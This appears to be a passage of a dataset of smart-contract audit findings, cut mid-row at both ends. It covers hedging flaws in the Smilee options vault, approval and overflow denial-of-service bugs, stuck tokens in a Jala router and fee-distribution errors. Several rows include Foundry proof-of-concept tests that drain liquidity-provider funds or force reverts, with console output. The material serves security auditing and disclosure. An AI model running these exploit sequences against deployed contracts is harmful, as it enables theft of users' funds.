WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n" +Trading out of the money options has delta = 0 which breaks protocol assumptions of traders profit being fully hedged and can result in a loss of funds to LPs,medium,"Smilee protocol fully hedges all traders pnl by re-balancing the vault between base and side tokens after each trade. This is the assumption about this from the docs:\\nIn the other words, any profit for traders is taken from the hedge and not from the vault Liquidity Providers funds. LP payoff must be at least the underlying DEX (Uniswap) payoff without fees with the same settings.\\nHowever, out of the money options (IG Bull when `price < strike` or IG Bear when price > strike) have `delta = 0`, meaning that trading such options doesn't influence vault re-balancing. Since the price of these options changes depending on current asset price, any profit gained by traders from these trades is not hedged and thus becomes the loss of the vault LPs, breaking the assumption referenced above.\\nAs a result, LPs payout can becomes less than underlying DEX LPs payout without fees. And in extreme cases the vault funds might not be enough to cover traders payoff.\\nWhen the vault delta hedges its position after each trade, it only hedges in the money options, ignoring any out of the money options. For example, this is the calculation of the IG Bull delta (s is the current asset price, `k` is the strike):\\n```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n\\nThis is example scenario to demonstrate the issue:\\nstrike = 1\\nvault has deposits = 2 (base = 1, side = 1), available liquidity: bull = 1, bear = 1\\ntrader buys 1 IG bear. This ensures that no vault re-balance happens when `price < strike`\\nprice drops to 0.9. Trader buys 1 IG bull (premium paid = 0.000038)\\nprice raises to 0.99. Trader sells 1 IG bull (premium received = 0.001138). Trader profit = 0.0011\\nprice is back to 1. Trader sells back 1 IG bear.\\nat this point the vault has (base = 0.9989, side = 1), meaning LPs have lost some funds when the price = strike.\\nWhile the damage from 1 trade is not large, if this is repeated several times, the damage to LP funds will keep inceasing.\\nThis can be especially dangerous if very long dated expiries are used, for example annual IG options. If the asset price remains below the strike for most of the time and IG Bear liquidity is close to 100% usage, then all IG Bull trades will be unhedged, thus breaking the core protocol assumption that traders profit should not translate to LPs loss: in such case traders profit will be the same loss for LPs. In extreme volatility, if price drops by 50% then recovers, traders can profit 3% of the vault with each trade, so after 33 trades the vault will be fully drained.","The issue seems to be from the approximation of the delta for OTM options. Statistically, long-term, the issue shouldn't be a problem as the long-term expectation is positive for the LPs profit due to it. However, short-term, the traders profit can create issues, and this seems to be the protocol's core assumption. Possible solution can include more precise delta calculation, maybe still approximation, but slightly more precise than the current approximation used.\\nAlternatively, keep track of underlying DEX equivalent of LP payoff at the current price and if, after the trade, vault's notional is less than that, add fee = the difference, to ensure that the assumption above is always true (similar to how underlying DEX slippage is added as a fee).","In some specific trading conditions (IG Bear liquidity used close to 100% if price < strike, or IG Bull liquidity used close to 100% if price > strike), all or most of the traders pnl is not hedged and thus becomes loss or profit of the LPs, breaking the core protocol assumptions about hedging and in extreme cases can drain significant percentage of the vault (LPs) funds, up to a point of not being able to payout traders payoff.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport {TestnetPriceOracle} from ""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGTradeTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), _strike);\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n // to ensure no rebalance from price movement\\n console.log(""Buy 100% IG BEAR @ 1.0"");\\n testBuyOption(1e18, 0, 1e18);\\n\\n for (uint i = 0; i < 20; i++) {\\n // price moves down, we buy\\n vm.warp(block.timestamp + 1 hours);\\n console.log(""Buy 100% IG BULL @ 0.9"");\\n testBuyOption(0.9e18, 1e18, 0);\\n\\n // price moves up, we sell\\n vm.warp(block.timestamp + 1 hours);\\n console.log(""Sell 100% IG BULL @ 0.99"");\\n testSellOption(0.99e18, 1e18, 0);\\n }\\n\\n // sell back original\\n console.log(""Sell 100% IG BEAR @ 1.0"");\\n testSellOption(1e18, 0, 1e18);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n vm.stopPrank();\\n\\n console.log(""premium"", premium);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(""base token notional"", btAmount);\\n console.log(""side token notional"", stAmount);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(""payoff received"", charliePayoff);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(""base token notional"", btAmount);\\n console.log(""side token notional"", stAmount);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n// rest of code\\n Buy 100% IG BEAR @ 1.0\\n premium 6140201098441368\\n base token notional 1006140201098441412\\n side token notional 999999999999999956\\n Buy 100% IG BULL @ 0.9\\n premium 3853262173300493\\n base token notional 1009993463271741905\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 4865770659690694\\n base token notional 1005127692612051211\\n side token notional 999999999999999956\\n// rest of code\\n Buy 100% IG BULL @ 0.9\\n premium 1827837493502948\\n base token notional 984975976168184269\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 3172781130161218\\n base token notional 981803195038023051\\n side token notional 999999999999999956\\n Sell 100% IG BEAR @ 1.0\\n payoff received 3269654020920760\\n base token notional 978533541017102291\\n side token notional 999999999999999956\\n```\\n\\nNotice:\\nInitial vault balance at the asset price of 1.0 is base = 1, side = 1\\nAll IG Bull trades do not change vault side token balance (no re-balancing happens)\\nAfter 20 trades, at the asset price of 1.0, base = 0.9785, side = 1\\nThis means that 20 profitable trades create a 1.07% loss for the vault. Similar scenario for annual options with 50% price move shows 3% vault loss per trade.","```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n" +"If the vault's side token balance is 0 or a tiny amount, then most if not all IG Bear trades will revert due to incorrect check of computation error during delta hedge amount calculation",medium,"When delta hedge amount is calculated in `FinanceIGDelta.deltaHedgeAmount`, the last step is to verify that delta hedge amount to sell is slightly more than vault's side token due to computation error. The check is the following:\\n```\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe check works correctly most of the time, but if the vault's side token (param.sideTokensAmount) is 0 or close to it, then the check will always fail, because `0 / 10000 = 0` and unsigned amount can not be less than 0. This means that even tiny amount to sell (like 1 wei) will revert the transaction if the vault has 0 side tokens.\\nVault's side token is 0 when:\\nthe current price trades above high boundary (Kb)\\nand IG Bull used liquidity equals 0\\nIn such situation, any IG bear trade doesn't impact hedge amount, but due to computation error will almost always result in tiny but non-0 side token amount to sell value, which will revert due to incorrect comparision described above.","Possibly check both relative (sideToken / 10000) and absolute (e.g. 1000 or side token UNIT / 10000) value. Alternatively, always limit side token to sell amount to max of side token balance when hedging (but needs additional research if that might create issues).","Almost all IG Bear trades will revert in certain situations, leading to core protocol function being unavailable and potentially loss of funds to the users who expected to do these trades.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport {TestnetPriceOracle} from ""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGTradeTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.24e18, 1, 0); // re-balance to have 0 side tokens\\n testBuyOption(1.24e18, 0, 0.1e18); // reverts due to computation error and incorrect check to fix it\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n vm.stopPrank();\\n\\n console.log(""premium"", premium);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal returns (uint) {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(""payoff received"", charliePayoff);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nNotice: execution will revert when trying to buy IG Bear options.","```\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n" +Mint and sales can be dossed due to lack of safeApprove to 0,medium,"The lack of approval to 0 to the dvp contract, and the fee managers during DVP mints and sales will cause that subsequent transactions involving approval of these contracts to spend the basetoken will fail, breaking their functionality.\\nWhen DVPs are to be minted and sold through the PositionManager, the `mint` and `sell` functions are invoked. The first issue appears here, where the DVP contract is approved to spend the basetoken using the OpenZeppelin's `safeApprove` function, without first approving to zero. Further down the line, the `mint` and `sell` functions make calls to the DVP contract to `mint` and burn DVP respectively.\\nThe _mint and _burn functions in the DVP contract approves the fee manager to spend the fee - vaultFee/netFee.\\nThis issue here is that OpenZeppelin's `safeApprove()` function does not allow changing a non-zero allowance to another non-zero allowance. This will therefore cause all subsequent approval of the basetoken to fail after the first approval, dossing the contract's minting and selling/burning functionality.\\nOpenZeppelin's `safeApprove()` will revert if the account already is approved and the new `safeApprove()` is done with a non-zero value.\\n```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n ""SafeERC20: approve from non-zero to non-zero allowance""\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\n",Approve first to 0;\\nUpdate the OpenZeppelin version to the latest and use the `forceApprove` functions instead;\\nRefactor the functions to allow for direct transfer of base tokens to the DVP and FeeManager contracts directly.,"This causes that after the first approval for the baseToken has been given, subsequent approvals will fail causing the functions to fail.","```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n ""SafeERC20: approve from non-zero to non-zero allowance""\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\n" +User wrapped tokens get stuck in master router because of incorrect calculation,medium,"Swapping exact tokens for ETH swaps underlying token amount, not wrapped token amount and this causes wrapped tokens to get stuck in the contract.\\nIn the protocol the `JalaMasterRouter` is used to swap tokens with less than 18 decimals. It is achieved by wrapping the underlying tokens and interacting with the `JalaRouter02`. Wrapping the token gives it decimals 18 (18 - token.decimals()). There are also functions that swap with native ETH.\\nIn the `swapExactTokensForETH` function the tokens are transferred from the user to the Jala master router, wrapped, approved to `JalaRouter2` and then `IJalaRouter02::swapExactTokensForETH()` is called with the amount of tokens to swap, to address, deadline and path.\\nThe amount of tokens to swap that is passed, is the amount before the wrap. Hence the wrappedAmount - underlyingAmount is stuck.\\nAdd the following test to `JalaMasterRouter.t.sol` and run with `forge test --mt testswapExactTokensForETHStuckTokens -vvv`\\n```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(""ETH user balance before: "", user0.balance);\\n console.log(""TokenA user balance before: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance before: "", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(""ETH user balance after: "", user0.balance);\\n console.log(""TokenA user balance after: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance after: "", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\n","In `JalaMasterRouter::swapExactTokensForETH()` multiply the `amountIn` by decimal off set of the token:\\n```\\n function swapExactTokensForETH(\\n address originTokenAddress,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address[] calldata path,\\n address to,\\n uint256 deadline\\n ) external virtual override returns (uint256[] memory amounts) {\\n address wrappedTokenIn = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(originTokenAddress);\\n\\n require(path[0] == wrappedTokenIn, ""MS: !path"");\\n\\n TransferHelper.safeTransferFrom(originTokenAddress, msg.sender, address(this), amountIn);\\n _approveAndWrap(originTokenAddress, amountIn);\\n IERC20(wrappedTokenIn).approve(router, IERC20(wrappedTokenIn).balanceOf(address(this)));\\n\\n// Add the line below\\n uint256 decimalOffset = IChilizWrappedERC20(wrappedTokenIn).getDecimalsOffset();\\n// Add the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn * decimalOffset, amountOutMin, path, to, deadline);\\n// Remove the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn , amountOutMin, path, to, deadline);\\n }\\n```\\n","User wrapped tokens get stuck in router contract. The can be stolen by someone performing a `swapExactTokensForTokens()` because it uses the whole balance of the contract when swapping: `IERC20(wrappedTokenIn).balanceOf(address(this))`\\n```\\n amounts = IJalaRouter02(router).swapExactTokensForTokens(\\n IERC20(wrappedTokenIn).balanceOf(address(this)),\\n amountOutMin,\\n path,\\n address(this),\\n deadline\\n );\\n```\\n","```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(""ETH user balance before: "", user0.balance);\\n console.log(""TokenA user balance before: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance before: "", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(""ETH user balance after: "", user0.balance);\\n console.log(""TokenA user balance after: "", tokenA.balanceOf(user0));\\n console.log(""WTokenA router balance after: "", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\n" +JalaPair potential permanent DoS due to overflow,medium,"In the `JalaPair::_update` function, overflow is intentionally desired in the calculations for `timeElapsed` and `priceCumulative`. This is forked from the UniswapV2 source code, and it's meant and known to overflow. UniswapV2 was developed using Solidity 0.6.6, where arithmetic operations overflow and underflow by default. However, Jala utilizes Solidity >=0.8.0, where such operations will automatically revert.\\n```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\n",Use the `unchecked` block to ensure everything overflows as expected,"This issue could potentially lead to permanent denial of service for a pool. All the core functionalities such as `mint`, `burn`, or `swap` would be broken. Consequently, all funds would be locked within the contract.\\nI think issue with High impact and a Low probability (merely due to the extended timeframe for the event's occurrence, it's important to note that this event will occur with 100% probability if the protocol exists at that time), should be considered at least as Medium.\\nReferences\\nThere are cases where the same issue is considered High.","```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\n" +"Fees aren't distributed properly for positions with multiple lenders, causing loss of funds for lenders",high,"Fees distributed are calculated according to a lender's amount lent divided by the total amount lent, which causes more recent lenders to steal fees from older lenders.\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThe above is from harvest(); `repay()` calculates the fees similarly. Because `borrow()` doesn't distribute fees, the following scenario will occur when a borrower increases an existing position:\\nBorrower has an existing position with fees not yet collected by the lenders.\\nBorrower increases the position with a loan from a new lender.\\n`harvest()` or `repay()` is called, and the new lender is credited with some of the previous fees earned by the other lenders due to the fees calculation. Other lenders lose fees.\\nThis scenario can naturally occur during the normal functioning of the protocol, or a borrower/attacker with a position with a large amount of uncollected fees can maliciously open a proportionally large loan with an attacker to steal most of the fees.\\nAlso note that ANY UDPATE ISSUE? LOW PRIO",A potential fix is to harvest fees in the borrow() function; the scenario above will no longer be possible.,"Loss of funds for lenders, potential for borrowers to steal fees.","```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n" +Entrance fees are distributed wrongly in loans with multiple lenders,medium,"Entrance fees are distributed improperly, some lenders are likely to lose some portion of their entrance fees. Also, calling `updateHoldTokenEntranceFee()` can cause improper entrance fee distribution in loans with multiple lenders.\\nNote that entrance fees are added to the borrower's `feesOwed` when borrowing:\\n```\\n borrowing.feesOwed += entranceFee;\\n```\\n\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThis is a problem because the entrance fees will be distributed among all lenders instead of credited to each lender. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 